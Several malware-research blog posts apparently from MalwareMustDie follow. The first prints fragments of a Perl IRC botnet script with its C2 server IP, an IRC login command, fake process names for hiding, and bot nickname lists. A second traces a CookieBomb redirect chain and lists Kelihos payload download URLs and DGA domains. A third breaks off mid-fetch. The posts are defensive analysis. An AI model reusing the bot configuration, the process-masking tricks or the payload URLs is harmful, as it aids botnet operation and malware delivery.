logging = false;
channels = "#hackinganonymous";
connectcmd = "PRIVMSG x@channels.undernet.org : login 37 ZPhxkxzT";
away = "so we begin ;)";
norestricted = true;
#bind = "91.191.173.194";
#bind = "91.191.173.195";

-rw-r--r--   1 test     admin       37281 Oct 13 16:34 perl

[...]

my @admchan=("#mire");

$servidor='91.191.173.194' unless $servidor;


my $xeqt = "!";
my $homedir = "/tmp";
my $shellaccess = 1;
my $xstats = 1;
my $pacotes = 1;
my $linas_max = 5;
my $sleep = 6;
my $portime = 4;

my @fakeps = ("/usr/local/apache/bin/httpd -DSSL",
"/usr/sbin/httpd -k start -DSSL",
"/usr/sbin/httpd",
"gnome-pty-helper",
"httpd");

my @nickname = ("TeaMrx","fattys","eliter","vxbot","smufen","dual","lee","carro","frida",
"TeaMrx1","TeaMrx0","TeaMrx2","TeaMrx3","TeaMrx4","TeaMrx5","TeaMrx6","TeaMrx7",
"aVe","kmod","kmod2","uselib","raptor","tmpSH","pwned","w00t","DualDuo","Intel",
"AMDPwr","Geforce","Exploit","vx8m0d","indexs","index","index2","index3","index4",
"xQt1","xQt2","xQt3","xQt4","xQt5","xQt6","xQt7","xQt8","xQt9","xQt10","TeaMrxz",
"De","Der","Det","Var","Kam","Dea","Csa","Fbi","Dea","Narko","Gone","Feber","Tull",
"Tundra","st0rms","fLash","TheLight","Nikko","Nikie","Nikkie","daniel","t0nyandr",
"Europa","Fanta","Caroline","speedline","Perf0rm","indexs","dan","educat","catina",
"bindex","hindex","n0rway","myphp","phpvuln","Alarma","GoScan","oslocity","spette",
"Cascam","vSport","vSmotor","vSteam","vSturbo","Turbost","heeman","andy","loundry",
"ranger","Carbon","TypeR","Nozz","phpforum","Nxgas","NinaGirl","Isit","lama","ouch",
"vTeam","vSpot","vCrew","xeQta","Gourl","Vulnx","Hksurl","Greedy","Mrx","counyjail",
"Spourl","Torshov","Oslos","com_xeqt","mowgli","Asus","com_mrx","MrxTeam","arrest",
"vScrew","beran","stuing","ucutter","readnot","gethelp","curpos","cutext","Busted",
"detda","kanjo","neinei","Carbon","irriter","masa","dev-null","korsett","PerlTeam",
"jada","kanjeg","mutterz","dalenmin","heimdal","Gambler","Deanz","Phreak","Getno",
"Susa","Pils","Pilz","Bilz","Clubz","Clubs","Clubbin","Fights","Kampen","telenor",
"Karss","Gophy","reactor","fileporn","filemp3","filelist","free6","purextc","upc",
"Grandis","Piccaso","Vanda","varburen","Tiesto","Jean","DjEan","MeNe","ThiS","nO",
"drspeed","fuzzy","buzzz","GoScan","Vulned","Gourl","makeconf","sshdconf","ngtno",
"m0rtem","cat0","Fuckyall","Fuckit","Aem","Greedy","Hkss","Sparco","MoMo","Carbon",
"d3nyall","vipz","dualc0rz","twoc0re","gotit","h0lyshit","prtls","rapt0r","Getde",
"Vulnx","d3nyurl","vUlnurl","v0dka","Torshov","turboo","Boost","fasty","fr","getfr",
"datacore","dualcore","Daniel","spurv","byrds","jails","spoot","speels","ml","getd",
"Antivi","nod32","Screwed","alias","mekkka","template","f0rm3","p0ker","Geton","NO",
"Door","Borr","Jaarn","Sporet","Dopa","Hasjen","purxTc","Liquer","Justlink","Asust",
"Duffin","Durrett","Dussault","Dwyer","Eardley","Ebeling","Eckel","Edley","Edner",
"Edward","Eickenhorst","Eliasson","Erdos","Erez","Espinoza","Estes","Etter","Eina",
"Elmendorf","Elmerick","Elvis","Encinas","Enyeart","Eppling","Erbach","Erdman","d0",
"Everett","Fabbris","Fagan","Faioes","Altavista","Flamor","Faris","Farone","f00ln3t",
"Farren","Fasso'","Fates","Feigenbaum","Fejzo","Feldman","Euripides","Enzoo","d00rk",
"Wikii","Wifii","Jvc","s0nny","lekter","herrier","sp0ker","netply","netb0st","Liq",
"comma","julie","sveina","andre","pulsedj","p0ker","j0ker","eFn3t","Liers","xTcno",
"Suite","Incl","Page","Mappe","Oxyd","Infode","Senil","Powers","Langu","m0d","doch",
"Snakes","Ridder","Viking","Vikings","Norman","Norway","German","Info","Biz","Edud",
"Ninjas","Ilness","Teacer","Faceoff","devnull","MoMo","Spoon","Liquid","Goofy","Aj",
"Google","Yahoo","Altavista","Lycos","Sesam","Solno","Googler","ScamNet","w0rmnet",
"puman","Skeidar","Tinemelk","Freia","Tresis","Tbanen","Adenyed","Hulken","Pureice",
"Sperre","Lister","Burbon","burb0ns","Toy0","Proxes","WrxSti","Evo6","Evo7","Evo8",
"wss","bss","natron","kiwis","Reman","SevnUp","Perlpls","Spiid","Govbr","Govmil",
"Wssss","Files","xFiles","Dataw0rm","n3tw0rm","Info","Biz","Orgy","foksy","Reven",
"limbo","mambi","bambi","rummy","IluvPerl","PerlKing","Pokerking","Turboa","Gttt",
"BugScam","BugTraq","Trackqs","Que","Adidas","Umbro","Sportas","Liquid","Forume",
"Deka","Jbl","Adecco","M5R","Tuners","Techno","Sivilen","Baosh","Snuten","Purken",
"aaudi","coupe","netliga","liganet","netbase","NetSnok","Snoknet","Snifnet","libz",
"indexp","jooblaa","mamboo","Binl3n","Cplusplus","p3rls3x","illgoon","de","lime",
"homes","newsr","sindex","findex","shome","php3","eedan","Evens","Everest","kkk2",
"igal","c0lombia","freeme","dupen","d3nmark","s2ed3n","crypt0n","n0dam3n","itch",
"Domino","Tarsan","julie","Anett","Stine","Laura","Croft","Craft","Mrex","jiggy",
"Hemaan","c0nan","c0nmen","ImI","RdR","Ils","Ass","Dildo","Pula","Blow","Sn0rts",
"Aloalo","Nasa","DeaGov","FbiGov","NsaGov","CiaGov","CsiEdu","Hav0rd","djPulse",
"Oslos","Ils","cia","d3a","dea","nsa","nas","asa","kma","Scamurl","vito","xQt");

my @xident = ("noway","mirc","cmd","index","main","php","vuln","iiris","bx","sun","khan",
"info","cpu","pet","pacs","dino","megov","onet","xrm","tisi","parm","cico","jun",
"caos","fred","peace","dude","rox","rock","rokie","bayrn","gees","hval","wolf",
"do","go","ln","st","file","page","pag","pg","lg","lang","lng","srcs","action",
"sml","pod","nvidia","vidia","villa","kake","spat","solo","Cols","kols","kreft",
"lam","fal","dett","drop","snop","true","fake","yes","sir","mae","nmf","vmax","as",
"adio","audo","soren","tvtre","host","unitd","coda","cobra","mans","gmail","gtrs",
"remax","rik","fatig","poor","girls","pow","wop","wok","son","kolsa","royk","asss",
"los","las","angl","dream","fools","phol","phools","d0rk","spon","spalk","kalk",
"email","smtp","pops","imapd","pag","lang","lg","nav","php","spyer","cyp","hardy",
"email","null","mastr","drunk","full","beer","bayer","mage","neve","fist","haist",
"dara","dora","boris","dev","cupra","isgal","Yuri","Geez","Frys","dos","to","emul",
"pwned","kung","kim","lil","fatjo","fatman","fat","joe","does","quat","tres","eu",
"shv5","lrk","lkm","lkmrk","trk5","xt","tqex","itt","full","half","power","sender",
"does","tres","quat","fiat","spon","kvae","liim","papp","ddos","fart","noz","daim",
"liga","tvone","shdw","etcpwd","initd","ftpd","wuspl","proftp","newsd","sockd","lue",
"loma","Domma","hest","heist","tivoli","stud","dust","fust","Flue","nille","kenny",
"koma","loc","inc","incl","src","fokus","ford","chevy","wrc","cpu","cool","srchers",
"inc","incl","dir","file","sdir","mains","login","path","base","cmd","cats","farts",
"fiat","uno","jern","kober","liq","torsk","fisk","laks","hone","hore","buk","noman",
"lim","idem","prince","sveina","kine","kim","allan","hanne","terje","bukken","bruse",
"nu","do","li","faen","tater","doc","loc","pof","ninja","per","pets","sings","doper",
"liq","dop","heroin","dok","page","php3","pop","smtp","data","kilde","foss","lowrdr",
"drvby","viper","snake","dragon","dup","vuln","cat","grep","loop","inetd","proftpd",
"pasive","damp","wals","snoke","snik","poff","phil","pill","dra","drjo","djo","laby",
"rune","alan","britt","brita","stue","stenen","andy","bass","phatt","lover","fresa",
"jvc","jbl","cia","fed","sov","purk","snut","snif","deka","svovel","life","knife","so",
"deka","bos","boss","fres","spett","dusj","kappe","norman","keb0rd","fab","dor","bits",
"kniv","lisa","nina","ole","pat","mtv","charl","smokie","nabo","walk","brks","krad-3",
"dame","lady","bola","biffen","kamm","drev","sprider","spider","iscrem","daddy","pie",
"ono","tima","mytm","motor","vsmot","sport","fart","devs","var","tmp","spol","sture".
"jule","tree","gate","net","rand","perl","line","xqt","mrx","org","asus","sped","yaco",
"hash","hmm","ddos","pwr","nix","linux","bsd","ppal","aio","mars","bates","daim","da",
"pico","nmap","juge","sone","log","goofy","kars","meter","daim","kul","foksy","hyena",
"beta","pulse","driver","org","fos","kars","kma","fua","all","tea","foks","lady","fa",
"testo","bola","bolen","card","cards","chip","chips","wv","audi","bmw","roys","bechs",
"nokia","mrx","some","candy","goo","cool","scam","scan","google","lee","cam","li","dm",
"loff","grov","abcd","pulse","grow","alrt","spyd","trojan","maxd","xeqtd","xQtd","nodz",
"owner","crime","data","need","doper","hash","mysql","imapd","devil","shark","byn","ju");

my @xname = ("Googurl (C) 2006 xeQt","www.Google.com","* Im to lame to read Bitchx.doc *","BiatchX",
"Tveita Gjengen","Bgjengen","Agjengen","locos","putas","spooon","Type-R Turbo","Civic R Turbo",
"mIRC 6.1","* Im so lame i cant ready BitchX.doc *","Bill Gates","Cannon","Mtv","nos","nozzz",
"Sport Crew","vTeam","Turbo","random","paypal","netscam","www.milw0rm.com","lee","av","freace",
"trojan donkey","Monster Garage","Garage Inc.","Pimp Ma Shit","Pimp my ride","Freak out","Doch",
"www.packetstormsecurity.org","www.linux.com","www.freebsd.org","Hello There","tyson","mekkkka",
"Im just myself man","Can u get the clue?","Im not the only one","Fear the lions","mekka","nooo",
"Dragons back","Turbo Quattro","Sport Quattro","aheh goofy","Just for phun","gBill","goa","Yesir",
"Thats my mofo name","Snoooop Doggy Style...","Tricky Trickey","love, peace, and xeQt","rbot","ha",
"Clap your hands","one two tree, bass","lions","Drugs, sex, and xtc","i hate that biatch","ali",
"Go fuck yourself","whois meeee","Fatjoe Corp","Brooklyn Bounche","Dj Pulsedriver","lee","furu",
"Random","You have no clue","This rocks","uranium","BinLaden","Ted Bundy","Charlie Cheeens","hans",
"Will Smith","Freash Prince On IRC","Freash prince in bel air","Powered By PHPBB","mambo","ruy",
"dj pulse","Powered By xeQt","Delux","2pac","Biggie","Fuck sadam","Allah","Im your god idiot","id",
"Im to lame to read BitchX.doc","Boika","Diamonds","Jean claude Van dame","Arnold Schwartsneger",
"Stig","Anothony","White Power","Just do it","vSmotor vs. Turbo","Nismo Skyline GT-R R34","MySquad",
"Honda Civic Type-R","Maria Carrey","Terror Squad","I'm to lame to read BitchX.doc","w33d","hugo",
"WinXP 1999 (C) Bill Gates","Microsoft windows xeQtxpress","xeQt vS Mrx Team","Apache httpd server",
"arne","line","geir","terje","synne","linda","frode","my name?","teamrxPress","xeqters","asus power",
"Crash Test Dummy","Madonna","vX power","Team Windows","Bill Gates","Bill Gatez","Thats my girl...",
"Phunter","panter","Snaked","Hunted","Victums","PHPSH","mod_com_xQt","com_xeQter","com_team","assa",
"Nokia, Connecting People...","BitchX","smoke and fly","com_xeQt_Performance","TeaMrx Performance",
"xQt","Perlbot version vx9m0d v3","Googurl","Google lovers","xeQt_com","mrx_unit","com_asus","haist",
"TeaMrx Crew","xQt vS TeaMrx","xeQt vS Mrx","Powered by TeaMrx","Powered by xQt","com_xQt_mrx","com_x",
"com_teamrx","xeQt the way to go","Perl monks","perlhackers","perl genius","perl team","perl scanner",
"San Francisco","New York Gangbang..","Team Norway","Team Europe","Team Germany","Team Work","jet lie");

#################
# Random Ports
#################
my @rports = ("6667");

my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001",
"\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001",
"\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001",
"\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001",
"\001Snak for Macintosh 4.9.8 English\001",
"\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001",
"\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001",
"\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001",
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001",
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001",
"\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001",
"\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001",
"\001ircN 8.00  -  he tries to tell me what I put inside of me  - \001",
"\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001",
"\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001",
"\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001",
"\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001",
"\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001",
"\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1キ9] : Keep it to yourself!\001",
"\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001",
"\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001",
"\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10 - running on FreeBSD i386\001",
"\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there\001",
"\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there\001");

[...]

# xeQt

#my $nick = "bq";
my $nick = $nickname[rand scalar @nickname];
my $realname = $xname[rand scalar @xname];
my $ircname = $xident[rand scalar @xident];
my $porta = $rports[rand scalar @rports];
my $xproc = $fakeps[rand scalar @fakeps];
my $Mrx = $Mrx[rand scalar @Mrx];
my $version = 'PowerBots (C) GohacK';

[...]

Moral of the story

1. Attacks that seems coming from AAA country might not really coming from AAA, please be careful about this.
2. What stated/written as Romanian Hacker/AntiSec, was actually has a taste of skids from OTHER territory to me, by analyzing some keywords that was modified in the source code of the attacker script, other attack tools, and after checking deeper to their IRC channel.
3. Hardening your web server and if you use old PHP... #PatchNow!

Kudoz The Team Work!

MalMouse is explaining in his blog about HOW WIDE the target of these attack:

Our friend @n300trg is suggesting how to have better view on China hacked web server's page: Our friend @botnet_hunter came into conclusion as I did & straightly expose the facts:

Samples

The file size was huge, can not upload to our mediafire.. so below is the alternative:

We are uploading the sample via FTP for Law Enforcement Evidence Collectiing and Security Research purpose only, we don't share the sample for the requester with te private address nor twitter account, so please prepare your FTP account and contact us via this post's comment section (not to be published!) with mentioning your real name, your entity and email address for the reply. Thank you in advance. Below is the archive snapshot:


#MalwareMustDie!

How bad an IP's Reputation can be? A story of: 31.170.179.179 & 62.116.143.18 (park domains)

November 1, 2013, 12:29 pm
$
0
0
Many people often asked me "Can we trust malicious IP report?", and I always answer: "Hell, yes!", because actually behind those reports there are dedicated researchers working hard in proofing its badness, and believe me that nobody wants to verdict a false positive report ever.., so mostly malware and security researchers involved are confirming other reference or discuss to others to be sure beforehand.

This is a story about an IP address of : 31.170.179.179, it is still happily up and alive with the below details:

The IP is marked up bad (now). Has a very bad history, I was actually thinking this is a parked domains' IP, but yet, it still "IS" a bad bad evil IP, and I will describe its badness in the poor writing below:
(Note: Please block 31.170.179.179 and 62.116.143.18, so malware served by these hosts)

Historical & Reputation Research of 31.170.179.179 :

Below is the recent historical data of the IP, be free to search each domains stated in the details below to PoC what I stated.

xxx.wds03.com series of DGA... 

nxfifwwsia.wds03.com  A  31.170.179.179
lbkxibmtqb.wds03.com  A  31.170.179.179
wpad.wds03.com  A  31.170.179.179
yaivjmqekg.wds03.com  A  31.170.179.179
drwfvaol.wds03.com  A  31.170.179.179
sgtxranpom.wds03.com  A  31.170.179.179
isatap.wds03.com  A  31.170.179.179
ggrixhspar.wds03.com  A  31.170.179.179
ltbgnkzrzr.wds03.com  A  31.170.179.179
batmoflaqft.wds03.com  A  31.170.179.179
jwmspvljlv.wds03.com  A  31.170.179.179
vqblegfygqwgrqv.wds03.com  A  31.170.179.179
qpfjfcpsdy.wds03.com  A  31.170.179.179
ygwnaxsuoy.wds03.com  A  31.170.179.179
zsnwosoziz.wds03.com  A  31.170.179.179
xxx.x[1|2]-line.com series of DGA... 

xjfiozjjbg.a1-line.com  A  31.170.179.179
saqzurmcudg.a1-line.com  A  31.170.179.179
vrnftosdtr.a1-line.com  A  31.170.179.179
frrdwoidpt.a1-line.com  A  31.170.179.179
mcipgaxv.a1-line.com  A  31.170.179.179
bamaghbarm.c1-line.com  A  31.170.179.179
ivcodrfdmw.c1-line.com  A  31.170.179.179
xwvxbjxnpc.c2-line.com  A  31.170.179.179
nkrjtpmbjlaf.c2-line.co  A  31.170.179.179
imcuctlmdch.c2-line.com  A  31.170.179.179
bdukyhcboxps.c2-line.co  A  31.170.179.179
uvypmbkkqa.e2-line.com  A  31.170.179.179
marduxfkcp.e2-line.com  A  31.170.179.179
boodeyprwq.e2-line.com  A  31.170.179.179
aodnmpcvcv.e2-line.com  A  31.170.179.179
ulalzvsniy.e2-line.com  A  31.170.179.179
zxvsfkgraz.e2-line.com  A  31.170.179.179

(Spoofing?? Parking??) Records for Reverse-IP "addr.arpa" addresses..weird.. 

171.80.117.50.in-addr.arpa  A  31.170.179.179
219.80.117.50.in-addr.arpa  A  31.170.179.179
149.80.117.50.in-addr.arpa  A  31.170.179.179
201.128.241.213.202.in-addr.arpa  A  31.170.179.179
106.216.234.173.in-addr.arpa  A  31.170.179.179
200.196.234.173.in-addr.arpa  A  31.170.179.179
140.196.234.173.in-addr.arpa  A  31.170.179.179
240.196.234.173.in-addr.arpa  A  31.170.179.179
50.196.234.173.in-addr.arpa  A  31.170.179.179
221.196.234.173.in-addr.arpa  A  31.170.179.179
22.196.234.173.in-addr.arpa  A  31.170.179.179
84.196.234.173.in-addr.arpa  A  31.170.179.179
125.196.234.173.in-addr.arpa  A  31.170.179.179
65.196.234.173.in-addr.arpa  A  31.170.179.179
95.196.234.173.in-addr.arpa  A  31.170.179.179
6.196.234.173.in-addr.arpa  A  31.170.179.179
16.196.234.173.in-addr.arpa  A  31.170.179.179
186.196.234.173.in-addr.arpa  A  31.170.179.179
127.196.234.173.in-addr.arpa  A  31.170.179.179
187.196.234.173.in-addr.arpa  A  31.170.179.179
8.196.234.173.in-addr.arpa  A  31.170.179.179
48.196.234.173.in-addr.arpa  A  31.170.179.179
98.196.234.173.in-addr.arpa  A  31.170.179.179
9.196.234.173.in-addr.arpa  A  31.170.179.179
219.196.234.173.in-addr.arpa  A  31.170.179.179
139.196.234.173.in-addr.arpa  A  31.170.179.179
6.218.74.64.in-addr.arpa  A  31.170.179.179
194.242.61.94.in-addr.arpa  A  31.170.179.179
141.173.117.195.in-addr.arpa  A  31.170.179.179
200.128/25.139.151.216.in-addr.arpa  A  31.170.179.179
241.128/25.139.151.216.in-addr.arpa  A  31.170.179.179
155.128/25.250.152.216.in-addr.arpa  A  31.170.179.179

Palevo Botnet's CnC:


URL: https://palevotracker.abuse.ch/?ipaddress=31.170.179.179(Thank's to ABUSE.CH)

With the UrlQuery Records flagged as threat by Emerging Threat (good work!): URL: http://goo.gl/KD6XxT

Kelihos Domains and Payloads (I thank to OP-Kelihos, great team!): 

h00p://bixepfet.nl/inkr001.exe
h00p://yjtucerr.nl/nothin3.exe
h00p://jegijfyr.nl/nothin3.exe
h00p://huvjeyjq.nl/userid2.exe
h00p://qavukzak.nl/inkr001.exe
h00p://judnopem.nl/traff01.exe

Virus Total has longer history of this IP (Thank's for the good record!):

Link-->>[HERE]

OpenDNS Umbrella Lab's Graph (with thank you for sharing the tool!) has long records too:

And so on...

The past stays in the past.. No?

Up to this point some people may think like: "Yes, it was harmful, but maybe it was as a VPS used by bad actors, so now it "maybe" becoming a clean and parked one.
Well, the above possibility exists, but let's check it deeper using fresh status too. So I checked link to that IP to find the below recent verdict..

CookieBomb Infection as per TODAY (noted the uppercase)

I am lucky..a local site with infection just freshly spotted in honeypot, see the marked date:

(Noted the date of the screenshot)

This is that evil code:

With a simple JS decode:

Lead us to the ww9.jolyzgus.nl (31.170.179.179)…with some unusual hoolahoop multiple self-redirection.
PS: Below is the correct way to trace a CookieBomb in case you need a reference, PS2: mind the referrer used ;-)) 

* Connect() to jolyzgus.nl port 80 (#0)
*   Trying 31.170.179.179...
* connected
* Connected to jolyzgus.nl (31.170.179.179) port 80 (#0)
> GET /count21.php HTTP/1.1
> User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
> Host: jolyzgus.nl
> Accept: * / *
> Referer: greetz.from.malwaremustdie.org
> Cookie: visited_uq=55; expires=Tue, 2 Nov 2013 14:40:07 GMT; path=/

< HTTP/1.1 302 Found
< Server: nginx
< Date: Fri, 01 Nov 2013 12:04:22 GMT
< Content-Type: text/html
< Content-Length: 0
< Connection: keep-alive
< X-Powered-By: PHP/5.4.4-14
< Location: h00p://ww9.jolyzgus.nl
< Vary: Accept-Encoding

:
* Connected to ww9.jolyzgus.nl (31.170.179.179) port 80 (#0)
> GET / HTTP/1.1
> User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
> Host: ww9.jolyzgus.nl
> Accept: * / *
> Referer: greetz.from.malwaremustdie.org
> Cookie: visited_uq=55; expires=Tue, 2 Nov 2013 14:40:07 GMT; path=/

< HTTP/1.1 302 Found
< Server: nginx
< Date: Fri, 01 Nov 2013 14:36:01 GMT
< Content-Type: text/html
< Content-Length: 0
< Connection: keep-alive
< X-Powered-By: PHP/5.4.4-14
< Location: h00p://ww9.ww9.jolyzgus.nl
< Vary: Accept-Encoding
:
* About to connect() to ww9.ww9.jolyzgus.nl port 80 (#0)
*   Trying 31.170.179.179...
* connected
* Connected to ww9.ww9.jolyzgus.nl (31.170.179.179) port 80 (#0)
> GET / HTTP/1.1
> User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
> Host: ww9.ww9.jolyzgus.nl
> Accept: * / *
> Referer: greetz.from.malwaremustdie.org
> Cookie: visited_uq=55; expires=Tue, 2 Nov 2013 14:40:07 GMT; path=/

< HTTP/1.1 302 Found
< Server: nginx
< Date: Fri, 01 Nov 2013 14:36:47 GMT
< Content-Type: text/html
< Content-Length: 0
< Connection: keep-alive
< X-Powered-By: PHP/5.3.10-1ubuntu3.7
< Location: h00p://ww9.ww9.ww9.jolyzgus.nl
< Vary: Accept-Encoding
:
* About to connect() to ww9.ww9.ww9.jolyzgus.nl port 80 (#0)
*   Trying 31.170.179.179...
* connected
* Connected to ww9.ww9.ww9.jolyzgus.nl (31.170.179.179) port 80 (#0)
> GET / HTTP/1.1
> User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
> Host: ww9.ww9.ww9.jolyzgus.nl
> Accept: * / *
> Referer: greetz.from.malwaremustdie.org
> Cookie: visited_uq=55; expires=Tue, 2 Nov 2013 14:40:07 GMT; path=/

< HTTP/1.1 302 Found
< Server: nginx
< Date: Fri, 01 Nov 2013 14:37:16 GMT
< Content-Type: text/html
< Content-Length: 0
< Connection: keep-alive
< X-Powered-By: PHP/5.4.4-14
< Location: h00p://ww6.ww9.ww9.ww9.jolyzgus.nl
< Vary: Accept-Encoding
To be forwarded into a TDS in ww6.ww9.ww9.ww9.jolyzgus.nl (62.116.143.18) with kicking the parked domain's script. 
* Connect() to ww6.ww9.ww9.ww9.jolyzgus.nl port 80 (#0)
*   Trying 62.116.143.18...
* connected
* Connected to ww6.ww9.ww9.ww9.jolyzgus.nl (62.116.143.18) port 80 (#0)
> GET / HTTP/1.1
> User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
> Host: ww6.ww9.ww9.ww9.jolyzgus.nl
> Accept: * / *
> Referer: greetz.from.malwaremustdie.org
> Cookie: visited_uq=55; expires=Tue, 2 Nov 2013 14:40:07 GMT; path=/

< HTTP/1.1 200 OK
< Server: nginx
< Date: Fri, 01 Nov 2013 14:16:49 GMT
< Content-Type: text/html
< Transfer-Encoding: chunked
< Connection: keep-alive
< Keep-Alive: timeout=5
< Vary: Accept-Encoding
< X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>jolyzgus.nl</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<script type='text/javascript' language='JavaScript'>
var domain = 'jolyzgus.nl';
var uniqueTrackingID = 'MTM4MzMxNTQwOS43OTY4OmQ0ZjMzMTViMWY2NDUxMTY5NzlmMjM0ZmViNDZiZTUwYTI2Zjk0NWE=';
var clickTracking = true;
var themedata = '';
var xkw = '';
var xsearch = '';
var xpcat = '';
var rxid = '';
var bucket = '';
var clientID = '';
var clientIDs = '';
var num_ads = 0;
var adtest = 'off';
var scriptPath = '';
</script>
<script src='h00p://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>
<script type='text/javascript' language='JavaScript'>clickTracking = false;</script>
</head>
<body>
<script type='text/javascript' language='JavaScript'>
window.onload = function() {
 if(clickTracking && typeof track_onclick == 'function') track_onclick("d767765fe07cda70072a07be8009b9e13b9ce70d");
 location.href = "h00p://searchresultsguide.com/?dn=jolyzgus.nl&pid=9POGER71L";
};
</script>
</body>
* Connection #0 to host ww6.ww9.ww9.ww9.jolyzgus.nl left intact
</html>* Closing connection #0
Below are payloads on attempts to fetch malware files onto & calls to 62.116.143.18, the VT report for each payloads is so self-explanatory please see the behaviour analysis tab (if available): 
https://www.virustotal.com/en/file/19545f41f732280631e1b67302cdd8ab0d0e446a49c2022d6588f170ca9cbfb5/analysis/
https://www.virustotal.com/en/file/7c4a07f4c4fd3f9643cb1cf3d4aa7851ad790cf506efb150c0accc1fc85c2222/analysis/
https://www.virustotal.com/en/file/7fc85db12578612d73b5c670c4addec2d20f0154775addd43fab19450b8cd46a/analysis/
https://www.virustotal.com/en/file/8cab9d5987d5f72338981423043b9118d6eb20b146ea5f1f8000f25b50d2e46e/analysis/
https://www.virustotal.com/en/file/4280a7be51e34088d34eacd628af58b459672ac45b85b18113f8ed1f8bd19898/analysis/
https://www.virustotal.com/en/file/b7657dfc20e077929c89afb6d9c47dc16d1ef3a0404d7a5168d318651c223add/analysis/
https://www.virustotal.com/en/file/39d69b0a16a16c7cbb6b0118f1b5999f75c425918b66c9293509dc822593d383/analysis/
Additionally, Virus Total report of the 62.116.143.18 is here-->>[VirusTotal]

Just in case, the domain jolyzgus.nl is actually SUSPENDED and PARKED under below details, is it still infecting us? This is actually a real big mystery to all of us to check.. 

$ nslookup jolyzgus.nl

jolyzgus.nl
 origin = ns.parktons.com
 mail addr = root.gransy.com
 serial = 2013010310
 refresh = 1800
 retry = 10800
 expire = 604800
 minimum = 1800
jolyzgus.nl nameserver = ns.parktons.com.
jolyzgus.nl nameserver = ns2.parktons.com.
jolyzgus.nl internet address = 31.170.179.179


$ whois jolyzgus.nl|less

Domain name: jolyzgus.nl
Status:      active

Registrar:
   1API Gmbh
   Talstrasse 27
   66424 Homburg
   Deutschland
   Germany

Registrant DemieGoudswaard
Administrative contact admin@jolyzgus.nl
Technical contact(s) admin@jolyzgus.nl

Domain nameservers:
   ns1.1apidomainondispute.net
   ns2.1apidomainondispute.net
   ns3.1apidomainondispute.net
   DNSSEC:      no

Date registered  2013-08-28
Date of last change  2013-09-02
Record maintained by  NL Domain Registry
Be free to comment! :-)

Additional / Final Conclusion:

As per initially suspected, after deeper investigation taken, the cookiebomb malware domain jolyzgus.nl was gone and the domains was parked under 31.170.179.179 (parktons.com) which having auto-forwarder to affiliate parking domain service in 62.116.143.18 (parkingcrew.com)

We still have question HOW a parked domain's IP can still provide malware samples as per reported, and this matter's investigation is still open with the result to be added accordingly.

#MalwareMustDie!

RunForrestRun DGA (is alive!!) at 91.233.244.102 (Old Evil Code Come Back With New Obfuscation Trick)

November 2, 2013, 3:32 am
$
0
0
I was mentioned by our friend the for the detected RunForrestRun DGA obfuscation code as per below tweet (Thank's for the notification, Bart!) :

Yes I fetched and take a look at it: 

--2013-11-02 17:06:54--  h00p://portail-val-de-loir.com/
Resolving portail-val-de-loir.com... seconds 0.00, 85.10.130.29
Caching portail-val-de-loir.com => 85.10.130.29
Connecting to portail-val-de-loir.com|85.10.130.29|:80... seconds 0.00, connected.
  :
GET / HTTP/1.0
Referer: remember.us.malwaremustdie.org
Host: portail-val-de-loir.com
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Date: Sat, 02 Nov 2013 08:06:30 GMT
Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl
/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Thu, 12 Jul 2012 01:52:59 GMT
ETag: "18f21da-32bd2b-4c498391b34c0"
Accept-Ranges: bytes
